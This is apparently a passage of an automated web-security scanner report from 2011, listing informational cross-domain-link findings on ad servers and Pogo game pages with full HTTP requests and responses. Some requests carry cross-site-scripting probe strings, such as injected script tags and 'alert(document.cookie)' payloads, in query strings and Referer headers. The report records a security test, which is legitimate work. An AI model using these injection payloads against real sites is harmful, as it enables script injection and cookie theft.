c=1431&kw=Create%20New%20Worlds%20(Ken%20McBride)%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Create%20New%20Worlds%20(Ken%20McBride)%20NFHC&utm_content=GDBSO_4a&utm_campaign=GDBS-O"><img src="http://s0.2mdn.net/viewad/2070351/46-728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

16.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5621.148484.0233710364621/B4682144

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUud4JBjOvVEPb9oPYU2JxV9_yEr9nZW8sdXNhLHQsMTI5NDUzNjE3NTQ1MSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNS1QMCxsLDUxODExCg--/clkurl=;ord=1146439319?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2070351/1-Robot_Online_728x90.jpg

Request

GET /adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUud4JBjOvVEPb9oPYU2JxV9_yEr9nZW8sdXNhLHQsMTI5NDUzNjE3NTQ1MSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNS1QMCxsLDUxODExCg--/clkurl=;ord=1146439319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:22:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 742

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/4/a7/%2a/i
...[SNIP]...
Cg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O"><img src="http://s0.2mdn.net/viewad/2070351/1-Robot_Online_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

16.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6457.4298.ADVERTISING.COM/B4840137.13

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630%5E906164%5E1%5E0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2895566/160600_glam_groupon.jpg

Request

GET /adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630%5E906164%5E1%5E0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 01:29:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 596

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/c/ad/%2a/t;229510959;0-0;0;53541093;2321-160/600;38441153/38458910/1;;~sscs=%3fhttp://r1.ace.advertising.com/click/si
...[SNIP]...
1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=http%3a%2f%2fwww.groupon.com/subscribe%3Futm_source%3Dadv%26utm_medium%3Dcpc%26utm_campaign%3D160%26a%3DBanner%26s%3D160x600%26i%3Dsweet%26p%3D%7Bsite%7D"><img src="http://s0.2mdn.net/viewad/2895566/160600_glam_groupon.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

16.8. http://ad.doubleclick.net/adj/home.pogo/spotlight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/home.pogo/spotlight

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=357237?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=357237? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 01:24:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 261

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/0/0/%2a/i;44306;0-0;0;16162883;26972-980/50;0/0/0;;~aopt=2/0/e/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

16.9. http://ad.doubleclick.net/adj/home.pogo/spotlight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/home.pogo/spotlight

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=2;sz=300x250;ord=759632?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2807622/WordWhomp_Traffic_Drivers_300x250.jpg

Request

GET /adj/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=2;sz=300x250;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 01:26:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 343

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/0/0/%2a/j;231345042;0-0;7;16162883;4307-300/250;40152946/40170733/1;;~aopt=2/0/e/0;~sscs=%3fhttp://www.pogo.com/games/whomp"><img src="http://s0.2mdn.net/viewad/2807622/WordWhomp_Traffic_Drivers_300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

16.10. http://ad.doubleclick.net/adj/ic.us.wx/fcst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ic.us.wx/fcst

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=ord-15834307958312271872*tile-1;ord=15834307958312271872?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/ic.us.wx/fcst;preempt=y;adnet=y;cat=fcst;dma=513;tile=1;!c=ic;pos=wx_pc;sz=1x1;u=ord-15834307958312271872*tile-1;ord=15834307958312271872? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(document.cookie))%2223d5246f6f3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 01:45:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 287

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a8a/0/0/%2a/n;44306;0-0;0;51429741;31-1/1;0/0/0;u=ord-15834307958312271872*tile-1;~aopt=2/1/53/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

16.11. http://ad.doubleclick.net/adj/pand.default/prod.backstage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/pand.default/prod.backstage

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/pand.default/prod.backstage;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=160x600;tile=2;ord=1294536184817674250

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/pand.default/prod.backstage;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=160x600;tile=2;ord=1294536184817674250 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/backstageAdEmbed.html?sz=160x600&ord=1294536184817674250&clean=0&spgs=0&tile=2&genre=&_id=skyscraper_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 01:23:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 314

document.write('<a target="new" href="http://ad.doubleclick.net/click;h=v8/3a8a/0/0/%2a/f;44306;0-0;0;13815974;2321-160/600;0/0/0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;~aopt=2/0/ff/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

16.12. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:01:48 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

16.13. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:22:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 01:22:56 GMT
Pragma: no-cache
Content-Length: 4957
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

16.14. http://board-games.pogo.com/games/monopoly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The page was loaded from a URL containing a query string:

http://board-games.pogo.com/games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=325955883
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1 HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/14
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; com.pogo.recent=scrabble.2player.social.17fbdp; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294537888307-New%7C1297129888307%3B; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:12:37 GMT
Server: Apache-Coyote/1.1
Content-Length: 61036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=325955883"></iframe>
...[SNIP]...

16.15. http://download-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/?site=pogo&refid=headernav_fp_shopmenu&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/Hidden_Expedition_Titanic-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=Hidden_Expedition_Titanic-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Jewel_Quest_3-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=Jewel_Quest_3-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/The_Poppit_Show-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=The_Poppit_Show-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/buried_in_time_82138844-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=buried_in_time_82138844-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_lights_camera_action_03564200-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=cake_mania_lights_camera_action_03564200-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cooking_dash_3_CE_84651245-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=cooking_dash_3_CE_84651245-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/haunted_hidden_object_bundle_23135400-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=haunted_hidden_object_bundle_23135400-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/monopolycity_29678465-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=monopolycity_29678465-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/power_puzzle_pack_35128649-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Bundles&ln=en&ext=power_puzzle_pack_35128649-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/wedding_dash_forever_91283329-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Time Management&ln=en&ext=wedding_dash_forever_91283329-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111565320&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111730453&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
